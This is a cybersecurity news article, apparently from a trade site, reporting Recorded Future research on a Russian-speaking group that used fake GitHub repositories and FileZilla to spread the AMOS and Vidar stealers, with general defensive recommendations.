Cyber Security

Hackers Exploited GitHub and FileZilla to Deliver Banking Malware

The Insikt Group at Recorded Future has found a sophisticated cybercrime operation run by Russian-speaking threat actors from the Commonwealth of Independent States (CIS).

This group of hackers has used safe websites like GitHub and FileZilla to spread banking malware, which is very dangerous for both personal and business security.

GitCaught: Exposing the Misuse of GitHub in Cyberattacks

The people behind this effort are very skilled and know a lot about how software works and how to keep users trusting it.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

They created fake GitHub accounts and repositories that resembled real software programs, such as Pixelmator Pro, 1Password, and Bartender 5.

These fake versions were filled with malware, such as the Atomic MacOS Stealer (AMOS) and Vidar, meant to access users’ computers and steal private information.

The Insight Group at Recorded Future researched and found that these types of malware were not separate incidents.

Instead, they used the same command-and-control (C2) infrastructure, which shows that they worked together to make the strikes more powerful.

This shared C2 setup makes it look like the threat actors are part of a well-organized group with a lot of money that can start long-lasting cyberattacks on various devices and operating systems.

The changing nature of these types of malware makes it very hard for standard security measures to work.

Because software is always getting smarter and more complicated, cybersecurity needs to be proactive and flexible.

Organizations are told to follow strict security rules, especially when adding code outside their settings.

Setting up a code review process for the whole company and using automated scanning tools like GitGuardian, Checkmarx, or GitHub Advanced Security can help find malware or strange patterns in the code.

FileZilla: Another Vector for Malware Distribution

The bad guys have also used FileZilla, a famous FTP client, to spread their malicious payloads along with GitHub.

Cybercriminals have been able to stage cyberattacks that steal personal information with shocking ease by using well-known internet services.

The complexity of the operation and the fact that new malware is always being made show how important it is to take a multi-layered approach to cybersecurity.

In the middle term, businesses should improve their general security by devising ways to monitor and block unauthorized programs and scripts from third parties that could be used to spread malware.

It’s also important to share information and collaborate with the larger cybersecurity community to fight complex campaigns like the one this study found.

The results from Recorded Future’s Insight Group show the importance of being alert and taking action when online threats change.

Cybercriminals still use trusted platforms to spread malware, so businesses must stay alert and use full security plans to keep their systems and data safe.

To get a full report as a PDF file with more information and a more in-depth study, click here.

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers

Dhivya

Divya is a Senior Journalist at Cyber Security news covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Recent Posts

How to Track Advanced Persistent Threats (APT) Using Threat Intelligence Lookup Tool

An Advanced Persistent Threat (APT) is a sophisticated and stealthy cyberattack designed to gain unauthorized,…

6 minutes ago

Researchers Hacked into Software Supply Chain and Earned $50K Bounty

Researchers found a significant software supply chain vulnerability, which resulted in an outstanding $50,500 bounty…

2 hours ago

ZeroLogon Ransomware Exploit Active Directory Vulnerability To Gain Domain Controller Access

A significant threat has emerged in the form of the ZeroLogon ransomware exploit. This exploit…

2 hours ago

zkLend Hacked – $8.5M Stolen, Company offers 10% whitehat Bounty to Attacker

zkLend, a prominent decentralized finance (DeFi) protocol built on Ethereum's Layer-2 zk-rollup technology, has fallen…

3 hours ago

New YouTube Bug Exploited to Leak Users’ Email Addresses

A critical vulnerability in YouTube’s infrastructure allowed attackers to expose the email addresses tied to…

3 hours ago

Mirai Botnet Exploting Router Vulnerabilities to Gain Complete Device Control

A new wave of cyberattacks has surfaced, with a Mirai-based botnet exploiting a number of…

4 hours ago